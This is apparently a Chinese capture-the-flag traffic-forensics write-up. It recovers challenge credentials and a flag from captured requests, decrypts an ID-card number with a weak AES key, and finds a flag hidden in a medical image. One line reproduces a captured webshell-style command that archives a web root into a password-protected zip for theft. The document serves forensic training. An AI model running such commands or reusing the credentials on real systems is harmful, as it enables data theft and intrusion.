flag{3f3c1b49504191faf6576866f99806cd}
数据分析3
post过滤,找到用户名和密码
admin:admin@QWEzxc
通过thekey过滤,得到
D124759C42CDF90C
解密返回包,得到数据库的用户名和密码
webuser:1q2w3e4r5t6y
数据分析5
搜索张三,找到加密的身份证数据,C740DE421B66E88AEB080FC4F9CA5198650633861AB15C0DE28AB85030427F15,弱口令aes解密得到身份证
420116194503103216
4825376109164835
在请求包中找到压缩包的密码
cd /d "E:phpstudy_proWWWwwwCT"&"C:/Program Files/7-Zip/7z.exe" a -pshuanqq1234 ct.zip ./&echo 514f89&cd&echo b3d11fb9bc74
导出压缩包,解压得到一堆医疗影像图,找到张三的影像图另存为png
在blue的0通道找到flag